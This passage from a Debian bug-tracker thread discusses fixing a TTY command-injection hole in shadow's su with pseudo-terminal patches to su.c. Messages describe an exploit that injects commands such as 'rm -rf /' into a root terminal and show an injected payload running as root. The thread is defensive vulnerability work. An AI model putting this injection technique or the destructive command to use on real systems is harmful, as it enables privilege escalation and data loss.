Message #126 received at 628843@bugs.debian.org (full text, mbox, reply):

Hello,

I'm adding a small fix to the suggested patch before just to avoid
messages on stderr if case of not having a controlling tty:



___BEGIN_PATCH___
--- shadow-4.1.5.1.orig/src/su.c	2013-03-29 21:52:11.930790904 +0100
+++ shadow-4.1.5.1/src/su.c	2013-03-30 13:03:49.813030646 +0100
@@ -356,7 +356,7 @@ static void prepare_close_session (void)
 	/* This avoids the callee to inject commands on
 	 * the caller's tty including srappy incidents. */
 	ret = ioctl( STDIN_FILENO, TCFLSH, TCIFLUSH);
-	if( ret == -1)
+	if( ret == -1 && errno != ENOTTY)
 		fprintf (stderr, _("%s: Flushing input: %s\n"), Prog, strerror( errno));

 	if (0 != caught) {
___END_PATCH___




with best regards

Wolf

---

Message #131 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

Hello,

On Fri, Mar 29, 2013 at 11:54:21PM +0100, Wolfgang
Zarre wrote:
> I think that in any case the right solution is
> in just flushing the input queue before
> returning to the caller which would not just
> protect in case of hijacking but also of buggy
> applications.

I've successfuly tested an implementation which
keeps the exploit running in the background
_after_ returning control back to rot user. The
running exploit then periodicaly inserts commands
into root terminal, like whoami, rm -rf / etc :)

So flushing the input queue isn't a complete
solution.

-- 
With best regards,
xrgtn

[signature.asc (application/pgp-signature, inline)]

---

Message #136 received at 628843@bugs.debian.org (full text, mbox, reply):

Hello,

> I've successfuly tested an implementation which
> keeps the exploit running in the background
> _after_ returning control back to rot user. The
> running exploit then periodicaly inserts commands
> into root terminal, like whoami, rm -rf / etc :)
> 
> So flushing the input queue isn't a complete
> solution.
> 

Yes, You are right, this might work due the fact
that there is no control of additional forked
child's.

Further there is also additional the problem that
tty settings are not reset after return which
can be annoying as well but this is another story.

However, IMHO there might be two ways to handle
this issue which would be in figuring out if
permissions could handle that and the second
if it might be possible to control forked child's.


Would it be possible for You to post your
implementation?

Thanks.

Best regards
Wolf

---

Message #141 received at 628843@bugs.debian.org (full text, mbox, reply):

Hello,

As Alexander pointed out correctly the first suggested solution was not good enough
to solve the issue, but thanks to You @Alexander I could figure out the real issue.

Neither permission handling nor controlling the child process would resolve this
issue and also not assumed fixes in the implementation of TTY's Unix/Linux because
the issue it is simply the way how files are handled in a Unix system and a TTY is
just simply a file.

To demonstrate this just create a small program which is writing several text lines
to a file and change during execution ownership and permissions or even remove the
file and there will be no failure as long as the file handle is open.

In other words, if once a file descriptor is open and also if inherit from a forked
process, this process has all rights to do whatever it wants to do except if it
closes itself the file handle.

And that is exactly the issue with stdin in 'su' because after calling execve it
is out of our control if stdin gets closed or not.

In fact we need is the possibility to open a 'new' stdin just with the permissions
of the new session which we can close ourself at exit and this can be realised in
utilising pseudo terminal devices as implemented with the following patch.

Further the following patch was just tested roughly on Linux with PAM because of lack
of time but worked for me.


@Alexander:
I was using Your test procedure as You suggested but now if You want to have an
output You would have to redirect stdout and stderr to a file to see the result.


Another issue I realised during testing was the fact that the child process
cannot be killed with SIGTERM according to the blocked signal coded but which
might be a nice-to-have IMHO but I'm not sure if this behaviour is intentional
or not.

BTW: The patch is against shadow_4.1.5.1.orig.tar.gz which means without the
Debian patches.


___BEGIN_PATCH___
--- shadow-4.1.5.1.orig/src/su.c	2012-05-25 13:51:55.000000000 +0200
+++ shadow-4.1.5.1/src/su.c	2013-04-08 00:14:15.500412395 +0200
@@ -62,12 +62,10 @@
 #include <stdio.h>
 #include <sys/types.h>
 #include <unistd.h>
-#ifndef USE_PAM
 #include <sys/ioctl.h>
+#include <fcntl.h>
 #include <sys/types.h>
 #include <sys/stat.h>
-#include <fcntl.h>
-#endif				/* !USE_PAM */
 #include "prototypes.h"
 #include "defines.h"
 #include "pwauth.h"
@@ -85,6 +83,7 @@ const char *Prog;
 static /*@observer@*/const char *caller_tty = NULL;	/* Name of tty SU is run from */
 static bool caller_is_root = false;
 static uid_t caller_uid;
+static bool have_tty = false;
 #ifndef USE_PAM
 static bool caller_on_console = false;
 #ifdef SU_ACCESS
@@ -106,10 +105,10 @@ static bool change_environment = true;

 #ifdef USE_PAM
 static pam_handle_t *pamh = NULL;
+#endif
 static int caught = 0;
 /* PID of the child, in case it needs to be killed */
 static pid_t pid_child = 0;
-#endif

 /*
  * External identifiers
@@ -123,10 +122,9 @@ extern size_t newenvc; /* libmisc/env.c
 static void execve_shell (const char *shellname,
                           char *args[],
                           char *const envp[]);
-#ifdef USE_PAM
 static RETSIGTYPE kill_child (int unused(s));
-static void prepare_pam_close_session (void);
-#else				/* !USE_PAM */
+static void handle_session (void);
+#ifndef USE_PAM
 static RETSIGTYPE die (int);
 static bool iswheel (const char *);
 #endif				/* !USE_PAM */
@@ -177,7 +175,7 @@ static bool iswheel (const char *usernam
 	}
 	return is_on_list (grp->gr_mem, username);
 }
-#else				/* USE_PAM */
+#endif				/* USE_PAM */
 static RETSIGTYPE kill_child (int unused(s))
 {
 	if (0 != pid_child) {
@@ -189,7 +187,6 @@ static RETSIGTYPE kill_child (int unused
 	}
 	exit (255);
 }
-#endif				/* USE_PAM */

 /* borrowed from GNU sh-utils' "su.c" */
 static bool restricted_shell (const char *shellname)
@@ -260,7 +257,6 @@ static void execve_shell (const char *sh
 	}
 }

-#ifdef USE_PAM
 /* Signal handler for parent process later */
 static void catch_signals (int sig)
 {
@@ -268,19 +264,108 @@ static void catch_signals (int sig)
 }

 /*
- * prepare_pam_close_session - Fork and wait for the child to close the session
+ * handle_session - Fork and handle the session
  *
- *	Only the child returns. The parent will wait for the child to
+ *	Only the child returns. The parent will handle the session
+ *	or if not a controlling terminal then wait for the child to
  *	terminate and exit.
  */
-static void prepare_pam_close_session (void)
+static void handle_session (void)
 {
 	sigset_t ourset;
 	int status;
 	int ret;
+	int fd_ptmx = -1;
+	int fd_pts = -1;
+	char *pts_name = NULL;	
+	struct termios termset_save;
+	struct termios termset_new;
+	fd_set inp_fds;
+	struct timeval sel_to;
+	char trbuf[BUFSIZ];
+	ssize_t bytes_r;
+	struct winsize winsz;
+	bool winsz_set = false;
+
+
+
+	if( isatty( 0) == 1) {
+		have_tty = true;
+
+		if( tcgetattr( STDIN_FILENO, &termset_save) == -1) {
+			fprintf( stderr, _("%s: Cannot get termios attributes\n"), Prog);
+			exit( 1);
+		}
+
+		if( ioctl( STDIN_FILENO, TIOCGWINSZ, &winsz) == -1 )
+			fprintf( stderr, _("%s: Cannot get window size\n"), Prog);
+		else
+			winsz_set = true;
+		
+		/*
+		 * Open and prepare pseudo terminal master
+		 */
+		if( (fd_ptmx = open( "/dev/ptmx", O_RDWR)) == -1) {
+			fprintf( stderr, _("%s: Cannot open pt master\n"), Prog);
+			exit( 1);
+		}
+
+		if( grantpt( fd_ptmx) == -1) {
+			fprintf( stderr, _("%s: Cannot grant pt master permissions\n"), Prog);
+			close( fd_ptmx);
+			exit( 1);
+		}
+		if( unlockpt( fd_ptmx) == -1) {
+			fprintf( stderr, _("%s: Cannot unlock pt master\n"), Prog);
+			close( fd_ptmx);
+			exit( 1);
+		}
+
+		if( (pts_name = ptsname( fd_ptmx)) == NULL) {
+			fprintf( stderr, _("%s: Cannot get pt slave name\n"), Prog);
+			close( fd_ptmx);
+			exit( 1);
+		}
+
+		if( (fd_pts = open( pts_name, O_RDWR )) == -1) {
+			fprintf( stderr, _("%s: Cannot open pt slave\n"), Prog);
+			close( fd_ptmx);
+			exit( 1);
+		}
+	}
+
+

 	pid_child = fork ();
 	if (pid_child == 0) {	/* child shell */
+
+		if( have_tty == true) {
+			close( fd_ptmx);
+			
+			if( tcsetattr( fd_pts, TCSANOW, &termset_save) == -1) {
+				fprintf( stderr, _("%s: Cannot set set termios attributes of sessiont\n"), Prog);
+				close( fd_pts);
+				exit (1);
+			}
+
+			if( winsz_set == true && ioctl( fd_pts, TIOCSWINSZ, &winsz) == -1)
+				fprintf( stderr, _("%s: Cannot set window size of session %d\n"), Prog, errno);
+
+			dup2( fd_pts, STDIN_FILENO);
+			dup2( fd_pts, STDOUT_FILENO);
+			dup2( fd_pts, STDERR_FILENO);
+
+			if( STDIN_FILENO != fd_pts && STDOUT_FILENO != fd_pts
+					&& STDERR_FILENO != fd_pts)
+				close( fd_pts);
+
+			if( setsid() == -1)
+				fprintf( stderr, _("%s: Cannot set process group leader\n"), Prog);
+			else
+				if( ioctl( STDIN_FILENO, TIOCSCTTY, 1) == -1)
+					fprintf( stderr, _("%s: Cannot set controlling terminal\n"), Prog);
+
+		}
 		return; /* Only the child will return from pam_create_session */
 	} else if ((pid_t)-1 == pid_child) {
 		(void) fprintf (stderr,
@@ -310,18 +395,9 @@ static void prepare_pam_close_session (v

 		if (   (sigaddset (&ourset, SIGTERM) != 0)
 		    || (sigaddset (&ourset, SIGALRM) != 0)
+		    || (sigaddset (&ourset, SIGWINCH) != 0)
 		    || (sigaction (SIGTERM, &action, NULL) != 0)
-		    || (   !doshell /* handle SIGINT (Ctrl-C), SIGQUIT
-		                     * (Ctrl-\), and SIGTSTP (Ctrl-Z)
-		                     * since the child will not control
-		                     * the tty.
-		                     */
-		        && (   (sigaddset (&ourset, SIGINT)  != 0)
-		            || (sigaddset (&ourset, SIGQUIT) != 0)
-		            || (sigaddset (&ourset, SIGTSTP) != 0)
-		            || (sigaction (SIGINT,  &action, NULL) != 0)
-		            || (sigaction (SIGQUIT, &action, NULL) != 0)
-		            || (sigaction (SIGTSTP,  &action, NULL) != 0)))
+		    || (sigaction (SIGWINCH, &action, NULL) != 0)
 		    || (sigprocmask (SIG_UNBLOCK, &ourset, NULL) != 0)
 		    ) {
 			fprintf (stderr,
@@ -331,6 +407,13 @@ static void prepare_pam_close_session (v
 		}
 	}

+	if( have_tty == true) {
+		/* Set RAW mode  */
+		termset_new = termset_save;
+		cfmakeraw( &termset_new);
+		tcsetattr( STDIN_FILENO, TCSANOW, &termset_new);
+	}
+
 	if (0 == caught) {
 		bool stop = true;

@@ -338,7 +421,10 @@ static void prepare_pam_close_session (v
 			pid_t pid;
 			stop = true;

-			pid = waitpid (-1, &status, WUNTRACED);
+			if( have_tty == true)
+				pid = waitpid (-1, &status, WUNTRACED |WNOHANG);
+			else
+				pid = waitpid (-1, &status, WUNTRACED);

 			/* When interrupted by signal, the signal will be
 			 * forwarded to the child, and termination will be
@@ -354,7 +440,7 @@ static void prepare_pam_close_session (v
 				 */
 				kill (pid_child, SIGSTOP);
 				stop = false;
-			} else if (   ((pid_t)-1 != pid)
+			} else if (   ((pid_t)-1 != pid && have_tty == false)
 			           && (0 != WIFSTOPPED (status))) {
 				/* The child (shell) was suspended.
 				 * Suspend su. */
@@ -362,10 +448,68 @@ static void prepare_pam_close_session (v
 				/* wake child when resumed */
 				kill (pid, SIGCONT);
 				stop = false;
+			} else if( pid == (pid_t)0 && have_tty == true) {
+				stop = false;
+
+				if( caught == SIGWINCH) {
+					caught = 0;
+					if( ioctl( STDIN_FILENO, TIOCGWINSZ, &winsz) != -1)
+						ioctl( fd_pts, TIOCSWINSZ, &winsz);
+				}
+
+	            FD_ZERO( &inp_fds);
+    	        FD_SET( STDIN_FILENO, &inp_fds);
+        	    FD_SET( fd_ptmx, &inp_fds);
+				sel_to = (struct timeval){ 0, 10000};
+				
+	            if( select( fd_ptmx + 1, &inp_fds, NULL, NULL, &sel_to) == -1) {
+					if( errno == EINTR)
+						continue;
+					stop = true;
+				}
+            	if( FD_ISSET( STDIN_FILENO, &inp_fds)) {
+                	bytes_r = read( STDIN_FILENO, trbuf, BUFSIZ);
+                	if(	bytes_r <= 0) {
+						if( errno == EINTR)
+							continue;
+						fprintf( stderr, _("%s: Failure in reading from stdin\r\n"), Prog);
+                    	stop = true;
+					}
+
+                	if( bytes_r > 0 && write( fd_ptmx, trbuf, bytes_r) != bytes_r) {
+						if( errno == EINTR || errno == EIO)
+							continue;						
+						fprintf( stderr, _("%s: Failure in writing to session\r\n"), Prog);
+						stop = true;
+					}
+            	}
+
+            	if( FD_ISSET( fd_ptmx, &inp_fds)) {
+                	bytes_r = read( fd_ptmx, trbuf, BUFSIZ);
+                	if( bytes_r <= 0) {
+						if( errno == EINTR || errno == EIO)
+							continue;
+						fprintf( stderr, _("%s: Failure in reading from session %d %ld\r\n"), Prog, errno, bytes_r);
+                    	stop = true;
+					}
+
+                	if( bytes_r > 0 && write( STDOUT_FILENO, trbuf, bytes_r) != bytes_r) {
+						fprintf( stderr, _("%s: Failure in writing to stdout\r\n"), Prog);
+						stop = true;
+					}
+            	}			
 			}
 		} while (!stop);
 	}

+
+	if( have_tty == true) {
+		close( fd_pts);
+		/* Reset RAW mode  */
+		if( tcsetattr( STDIN_FILENO, TCSANOW, &termset_save) == -1)
+			fprintf( stderr, _("%s: Cannot reset termios attributes\n"), Prog);
+	}
+
 	if (0 != caught) {
 		(void) fputs ("\n", stderr);
 		(void) fputs (_("Session terminated, terminating shell..."),
@@ -373,6 +517,7 @@ static void prepare_pam_close_session (v
 		(void) kill (pid_child, caught);
 	}

+#ifdef USE_PAM
 	ret = pam_close_session (pamh, 0);
 	if (PAM_SUCCESS != ret) {
 		SYSLOG ((LOG_ERR, "pam_close_session: %s",
@@ -382,6 +527,7 @@ static void prepare_pam_close_session (v

 	(void) pam_setcred (pamh, PAM_DELETE_CRED);
 	(void) pam_end (pamh, PAM_SUCCESS);
+#endif				/* USE_PAM */

 	if (0 != caught) {
 		(void) signal (SIGALRM, kill_child);
@@ -395,7 +541,6 @@ static void prepare_pam_close_session (v
 	                                : WTERMSIG (status) + 128);
 	/* Only the child returns. See above. */
 }
-#endif				/* USE_PAM */

 /*
  * usage - print command line syntax and exit
@@ -1057,12 +1202,12 @@ int main (int argc, char **argv)
 		exit (1);
 	}

-	prepare_pam_close_session ();
-
 	/* become the new user */
 	if (change_uid (pw) != 0) {
 		exit (1);
 	}
+
+	handle_session ();
 #else				/* !USE_PAM */
 	/* no limits if su from root (unless su must fake login's behavior) */
 	if (!caller_is_root || fakelogin) {
@@ -1072,39 +1217,12 @@ int main (int argc, char **argv)
 	if (setup_uid_gid (pw, caller_on_console) != 0) {
 		exit (1);
 	}
-#endif				/* !USE_PAM */

-	set_environment (pw);
-
-	if (!doshell) {
-		/* There is no need for a controlling terminal.
-		 * This avoids the callee to inject commands on
-		 * the caller's tty. */
-		int err = -1;
+	handle_session ();
+#endif				/* !USE_PAM */

-#ifdef USE_PAM
-		/* When PAM is used, we are on the child */
-		err = setsid ();
-#else
-		/* Otherwise, we cannot use setsid */
-		int fd = open ("/dev/tty", O_RDWR);
-
-		if (fd >= 0) {
-			err = ioctl (fd, TIOCNOTTY, (char *) 0);
-			(void) close (fd);
-		} else if (ENXIO == errno) {
-			/* There are no controlling terminal already */
-			err = 0;
-		}
-#endif				/* USE_PAM */

-		if (-1 == err) {
-			(void) fprintf (stderr,
-			                _("%s: Cannot drop the controlling terminal\n"),
-			                Prog);
-			exit (1);
-		}
-	}
+	set_environment (pw);

 	/*
 	 * PAM_DATA_SILENT is not supported by some modules, and
___END_PATCH___




best regards

Wolf

---

Message #146 received at 628843@bugs.debian.org (full text, mbox, reply):

Hi,

with the stock debian shadow packages, trying the exploit in message #86
gives me:

root@d2:~# su - testme
exit
echo Payload as $(whoami)
testme@d2:~$ exit
logout
root@d2:~# echo Payload as $(whoami)
Payload as root

With this patch on top of 4.1.5, I get

root@d3:~# su - testme
configuration error - unknown item 'FAILLOG_ENAB' (notify administrator)
configuration error - unknown item 'FTMP_FILE' (notify administrator)
exit
echo Payload as $(whoami)
testme@d3:~$ exit
logout

---

Message #151 received at 628843@bugs.debian.org (full text, mbox, reply):

On Fri, 10 May 2013, Tim Connors wrote:

> Actually, the other thing you lose (I presuming caused by acting on bug
> #628843) is tty resizing by SIGWINCH.  ttys are really useful, it turns
> out.
>
> I have shedloads of up-to-date security patched RHEL5/6 machines, and I've
> never come across this problem on them.  Yep:
> rhel6> su -c  -u root 'cat /dev/tty'
> Password:
> asdasda
> asdasda
> debian-wheezy> su -c  -u root 'cat /dev/tty'
> Password:
> cat: /dev/tty: No such device or address
>
> Sorry, marking this bug as RC (pity I missed wheezy!), breaks other
> software.

As per some comments in #628843, the way this bug was addressed breaks su
-c to increase privledges.  It also breaks su -c to become a user and
execute something interactive.  Root isn't going to be doing stupid things
and running scripts that have been compromised (if they are, then they've
got bigger problems), so what's the problem? (why on earth would root ever
su to an untrusted user account?) I think this change should just be
backed out, and a prominent warning about the tty exploit placed in the
manpage.

-- 
Tim Connors

---

Message #156 received at 628843@bugs.debian.org (full text, mbox, reply):

As information at present I have a bit more time left in testing and
reworking the patch I sent with #141 which has some smaller issues with
signalling mostly SIGSTOP and SIGCONT and I hope that I can submit the
rework during this weekend.

@Serge
I'm sorry but I couldn't reproduce the behaviour as You submitted with
#146 and therefore I would like to ask You if You could provide me
with the checksums as in the .dsc file, if You run on 32Bit or
64Bit and if You have USE_PAM enabled or not.

Maybe I might be able to improve the patch or to fix that issue.


>> Actually, the other thing you lose (I presuming caused by acting on bug
>> #628843) is tty resizing by SIGWINCH.  ttys are really useful, it turns
>> out.
>>

No, this clearly comes from the tcsetpgrp() call inside bash returning -1 with
errno set to ENOTTY because of the missing controlling tty.


> 
> As per some comments in #628843, the way this bug was addressed breaks su
> -c to increase privledges.  It also breaks su -c to become a user and
> execute something interactive.  Root isn't going to be doing stupid things
> and running scripts that have been compromised (if they are, then they've
> got bigger problems), so what's the problem? (why on earth would root ever
> su to an untrusted user account?) I think this change should just be
> backed out, and a prominent warning about the tty exploit placed in the
> manpage.
> 

But this would be fixed with the patch in #141 without having any restrictions.

However, I don't agree with the statement that 'root' would never su to an
untrusted user account beside that, that from administrator point of view every
user account is 'untrusted' and in fact it is quite often that this happens
that 'root' is su'ing to non privileged users beside using a lot of starting
and maintenance scripts which are invoking su.

IMHO it is better to fix what is fixable to improve quality and safety instead
of making workarounds and warnings.


Best regards
Wolf

---

Message #161 received at 628843@bugs.debian.org (full text, mbox, reply):

Hello,

I created a branch (su-C_tty) starting with the patch from Wolfgang Zarre
(comment 141 in #628843). Thanks!

It seems to be the only way to fix this issue, even if it means I have to
maintain something I'm not confident with.
 

There is one thing I don't understand (let's start with this one):
When I execute a command with su –c <command>, it does not react to
SIGTSTP (either from Ctrl-Z or kill -SIGTSTP). It works OK when I execute
a shell.

Is this behavior expected? What is the reason?

Thanks in advance,
-- 
Nekral

---

Message #166 received at 628843@bugs.debian.org (full text, mbox, reply):

Hello,

First, I'm sorry that it took me now nearly three month to finish because always
when I have the impression having time left it turns the opposite.

However, finally I managed that the patch is working so far but it's not fully
tested.

Currently I just tested on amd64, with PAM authentication with bash job controlling
foreground/background and SIGSTOP/SIGCONT processes, so tests with other platforms and
shells are still necessary including non PAM authentication.

> 
> I created a branch (su-C_tty) starting with the patch from Wolfgang Zarre
> (comment 141 in #628843). Thanks!

You are welcome! The branch is on svn.debian.org ?


> There is one thing I don't understand (let's start with this one):
> When I execute a command with su –c <command>, it does not react to
> SIGTSTP (either from Ctrl-Z or kill -SIGTSTP). It works OK when I execute
> a shell.
> 
> Is this behavior expected? What is the reason?

Actually it's not expected however, there where issues as mentioned in #156
but was targeting more the issues as mentioned above to switch correct the
parent's tty between cooked and raw mode.

A short test was showing now that this is really not working as expected and
I'll try to investigate and rework the patch accordingly.



Best regards
Wolf

---

Message #171 received at 628843@bugs.debian.org (full text, mbox, reply):

Hi,

On Tue, Aug 27, 2013 at 11:43:59AM +0200, lkdev@essax.com wrote:
> 
> First, I'm sorry that it took me now nearly three month to finish because always
> when I have the impression having time left it turns the opposite.

I can't blame you here...

> > I created a branch (su-C_tty) starting with the patch from Wolfgang Zarre
> > (comment 141 in #628843). Thanks!
> 
> You are welcome! The branch is on svn.debian.org ?

There's been a switch to git in the mean time.
You can find the repo on github:
https://github.com/shadow-maint/shadow

> > There is one thing I don't understand (let's start with this one):
> > When I execute a command with su –c <command>, it does not react to
> > SIGTSTP (either from Ctrl-Z or kill -SIGTSTP). It works OK when I execute
> > a shell.
> > 
> > Is this behavior expected? What is the reason?
> 
> Actually it's not expected however, there where issues as mentioned in #156
> but was targeting more the issues as mentioned above to switch correct the
> parent's tty between cooked and raw mode.
> 
> A short test was showing now that this is really not working as expected and
> I'll try to investigate and rework the patch accordingly.


Thanks for your time.

Best Regards,
-- 
Nekral

---

Message #176 received at 628843@bugs.debian.org (full text, mbox, reply):

Hi,

> There's been a switch to git in the mean time.

I prefer git.

> You can find the repo on github:
> https://github.com/shadow-maint/shadow
> 

I cloned and I tried to merge as good as possible and therefore
I did also some rework.

Now Ctrl-Z is working as well as expected.


Beside a working version now there might be still
some improvements necessary, corrections or fixes.


Maybe some thoughts and notes to the merge:

@@ -360,14 +402,6 @@:
    I removed the terminal setting of the child due the fact
    that actually the system settings should be set like the
    same as at a normal login including the personal settings
    of a user.


@@ -423,7 +457,7 @@:
    I case of failures it is IMHO better to set SIGHUP instead
    SIGTERM because according to the code the child might be
    SIGKILLed by kill_child() if the child is a shell which
    ignores SIGTERM.


@@ -434,31 +468,39 @@:
    Due the fact that we are not always retrieving a signal to
    be able to switch correct between the parents tty's raw and cooked
    mode I found the way just in using the process group id to differ
    between background and foreground operation but independent
    if the child process is stopped or running.

    Important is that the parents tty stays sane except the
    su session gets SIGKILLed.



@@ -491,76 +549,146 @@:

    I was letting the tty reset outside the loop because we would loose
    the reset if there would be an interrupt between setting to raw mode
    and running the main loop.



Sorry for the mess with spaces and tab's however, due the
fact that the source file was mixed already it would be
good to do a re-base either to spaces or tabs.





Based on:
    branch: su-c_tty
    commit ad1ecc897b4168f36ef0cb048ebea101015521c8

___BEGIN_PATCH___
diff --git a/src/su.c b/src/su.c
index 34f6771..63f239e 100644
--- a/src/su.c
+++ b/src/su.c
@@ -60,7 +60,6 @@
 #include <pwd.h>
 #include <signal.h>
 #include <stdio.h>
-#include <sys/time.h>
 #include <sys/types.h>
 #include <unistd.h>
 #include <sys/ioctl.h>
@@ -220,6 +219,46 @@ static /*@noreturn@*/void su_failure (const char *tty, bool su_to_root)
 	exit (1);
 }

+static bool term_setattr( int fd, const struct termios *termset, bool hndl_sig) {
+
+    struct termios termset_new;
+    struct termios termset_check;
+
+	termset_new = *termset;
+	/* Set RAW mode  */
+	cfmakeraw( &termset_new);
+
+	if( hndl_sig)
+	    termset_new.c_lflag = ISIG;
+
+    if( tcsetattr( fd, TCSANOW, &termset_new) == -1) {
+        fprintf( stderr,
+                 _("%s: Cannot set raw mode\n"),
+                 Prog);
+        return false;
+    }
+
+    if( tcgetattr( fd, &termset_check) == -1) {
+        fprintf( stderr,
+                 _("%s: Cannot get terminal attributes\n"),
+                 Prog);
+        return false;
+    }
+
+    if( termset_new.c_iflag != termset_check.c_iflag ||
+        termset_new.c_oflag != termset_check.c_oflag ||
+        termset_new.c_cflag != termset_check.c_cflag ||
+        termset_new.c_lflag != termset_check.c_lflag ||
+        memcmp( &termset_new.c_cc, &termset_check.c_cc, NCCS) != 0) {
+
+        fprintf( stderr,
+                 _("%s: Could not set terminal attributes correctly\n"),
+                 Prog);
+        return false;
+    }
+    return true;
+}
+
 /*
  * execve_shell - Execute a shell with execve, or interpret it with
  * /bin/sh
@@ -280,19 +319,22 @@ static void handle_session (const struct passwd *pw)
 #endif				/* USE_PAM */
 	int fd_ptmx = -1;
 	int fd_pts = -1;
-	char *pts_name = NULL;	
+	char *pts_name = NULL;
 	struct termios termset_save;
-	struct termios termset_new;
 	fd_set inp_fds;
 	struct timeval sel_to;
 	char trbuf[BUFSIZ];
 	ssize_t bytes_r;
 	struct winsize winsz;
 	bool winsz_set = false;
+	pid_t pg_pid = 0;
+	pid_t pg_pid_cmp = 0;
+	pid_t pg_pid_tmp = 0;


+	pg_pid = getpid();

-	if (isatty (0) == 1) {
+	if (isatty ( STDIN_FILENO) == 1) {
 		have_tty = true;

 		if (tcgetattr (STDIN_FILENO, &termset_save) == -1) {
@@ -360,14 +402,6 @@ static void handle_session (const struct passwd *pw)
 		if (have_tty) {
 			close (fd_ptmx);

-			if (tcsetattr (fd_pts, TCSANOW, &termset_save) == -1) {
-				fprintf (stderr,
-				         _("%s: Cannot set termios attributes of session\n"),
-				         Prog);
-				(void) close (fd_pts);
-				exit (1);
-			}
-
 			if (   winsz_set
 			    && (ioctl (fd_pts, TIOCSWINSZ, &winsz) == -1)) {
 				fprintf (stderr,
@@ -423,7 +457,7 @@ static void handle_session (const struct passwd *pw)
 		(void) fprintf (stderr,
 		                _("%s: signal malfunction\n"),
 		                Prog);
-		caught = SIGTERM;
+		caught = SIGHUP;
 	}
 	if (0 == caught) {
 		struct sigaction action;
@@ -434,31 +468,39 @@ static void handle_session (const struct passwd *pw)
 		sigemptyset (&ourset);

 		if (   (sigaddset (&ourset, SIGTERM) != 0)
+		    || (sigaddset (&ourset, SIGINT) != 0)
 		    || (sigaddset (&ourset, SIGALRM) != 0)
 		    || (sigaddset (&ourset, SIGWINCH) != 0)
+		    || (sigaddset (&ourset, SIGCONT) != 0)
+		    || (sigaddset (&ourset, SIGTSTP) != 0)
 		    || (sigaction (SIGTERM, &action, NULL) != 0)
+		    || (sigaction (SIGINT, &action, NULL) != 0)
 		    || (sigaction (SIGWINCH, &action, NULL) != 0)
-		    || (sigprocmask (SIG_UNBLOCK, &ourset, NULL) != 0)) {
+		    || (sigaction (SIGCONT, &action, NULL) != 0)
+		    || (sigaction (SIGTSTP, &action, NULL) != 0)
+		    || (sigprocmask (SIG_UNBLOCK, &ourset, NULL) != 0)
+		    ) {
 			fprintf (stderr,
 			         _("%s: signal masking malfunction\n"),
 			         Prog);
-			caught = SIGTERM;
+			caught = SIGHUP;
 		}
 	}

 	if ((0 == caught) && have_tty) {
-		/* Set RAW mode  */
-		termset_new = termset_save;
-		cfmakeraw (&termset_new);
-		if (tcsetattr (STDIN_FILENO, TCSANOW, &termset_new) != 0) {
-			/* FIXME: At least one change was successful.
-			 * Success should be checked with tcsetattr */
-			fprintf (stderr,
-			         _("%s: Cannot set terminal attributes: %s\n"),
-			         Prog, strerror (errno));
-			caught = -1;
-		}
-	}
+		if( (pg_pid_tmp = tcgetpgrp( STDIN_FILENO)) == -1) {
+			fprintf( stderr, _("%s: Cannot get process group id\n"), Prog);
+			caught = SIGHUP;
+		} else {
+			/* Set raw mode if running in foreground */
+			if( pg_pid_tmp == pg_pid) {
+				/* Set RAW mode  */
+                if( term_setattr( STDIN_FILENO, &termset_save, !doshell) == false)
+                    caught = SIGHUP;
+            }
+            pg_pid_cmp = pg_pid_tmp;
+        }
+    }

 	if (0 == caught) {
 		bool stop = true;
@@ -466,6 +508,7 @@ static void handle_session (const struct passwd *pw)
 		do {
 			pid_t pid;
 			stop = true;
+			errno = 0;

 			if (have_tty) {
 				pid = waitpid (-1, &status, WUNTRACED | WNOHANG);
@@ -473,16 +516,31 @@ static void handle_session (const struct passwd *pw)
 				pid = waitpid (-1, &status, WUNTRACED);
 			}

-			if (   ((pid_t)-1 != pid && !have_tty)
+			/* When interrupted by signal, the signal will be
+			 * forwarded to the child, and termination will be
+			 * forced later.
+			 */
+			if (   (((pid_t)-1 == pid) && (EINTR == errno) && (SIGTSTP == caught)) ||
+			        ((pid == (pid_t)0) && (SIGTSTP == caught))) {
+				/* Except for SIGTSTP, which request to
+				 * stop the child.
+				 * We will SIGSTOP ourself on the next
+				 * waitpid round.
+				 */
+				kill (pid_child, SIGSTOP);
+				stop = false;
+			} else if ( ((pid_t)0 < pid)
 			           && (0 != WIFSTOPPED (status))) {
 				/* The child (shell) was suspended.
 				 * Suspend su. */
-				kill (getpid (), WSTOPSIG (status));
+				kill (pg_pid, WSTOPSIG (status));
 				/* wake child when resumed */
 				kill (pid, SIGCONT);
 				stop = false;
-			} else if (pid == (pid_t)0 && have_tty) {
-				stop = false;
+			} else if ( pid >= (pid_t)0 && have_tty) {
+
+				if( pid == (pid_t)0)
+					stop = false;

 				if (caught == SIGWINCH) {
 					caught = 0;
@@ -491,76 +549,146 @@ static void handle_session (const struct passwd *pw)
 					}
 				}

+				/* Reset 'process group pid compare' to set STDIN to 'raw' again */
+				if( caught == SIGCONT) {
+					caught = 0;
+					pg_pid_cmp = 0;
+				}
+
+                /* Terminate the child with SIGHUP to be able
+                 * to terminate a shell running as command
+                 */
+				if( caught == SIGINT)
+					kill( -pid_child, SIGHUP);
+
+				/* If caught by any other signal then stop */
+				if( caught != 0)
+					stop = true;
+
 				FD_ZERO (&inp_fds);
 				FD_SET (STDIN_FILENO, &inp_fds);
 				FD_SET (fd_ptmx, &inp_fds);
 				sel_to = (struct timeval){ 0, 10000};

 				if (select (fd_ptmx + 1, &inp_fds, NULL, NULL, &sel_to) == -1) {
-					if (errno == EINTR) {
+					if (errno == EINTR && stop == false) {
 						continue;
 					}
 					stop = true;
+					errno = 0;
 				}
 				if (FD_ISSET (STDIN_FILENO, &inp_fds)) {
-					bytes_r = read (STDIN_FILENO, trbuf, BUFSIZ);
-					if (bytes_r <= 0) {
-						if (errno == EINTR) {
-							continue;
-						}
-						fprintf (stderr,
-						         _("%s: Failure in reading from stdin\r\n"),
-						         Prog);
+					/* Get process group pid to compare with last run */
+					if ( (pg_pid_tmp = tcgetpgrp( STDIN_FILENO)) == -1) {
+						fprintf( stderr,
+						         _("%s: Cannot get process group id: %s\n"),
+						         Prog, strerror( errno));
 						stop = true;
+                        errno = 0;
 					}
-
-					if (   (bytes_r > 0)
-					    && (write (fd_ptmx, trbuf, bytes_r) != bytes_r)) {
-						if (errno == EINTR || errno == EIO) {
-							/* FIXME: are we
-							 * loosing some
-							 * bytes here? */
-							continue;
+					else {
+						
+						/* Running in foreground  if equal */
+						if( pg_pid_tmp == pg_pid) {
+
+							/* Set raw mode again if last run was in background */
+							if( pg_pid_cmp != pg_pid_tmp) {
+
+								/* Fetch term settings again because parent might have changed settings */
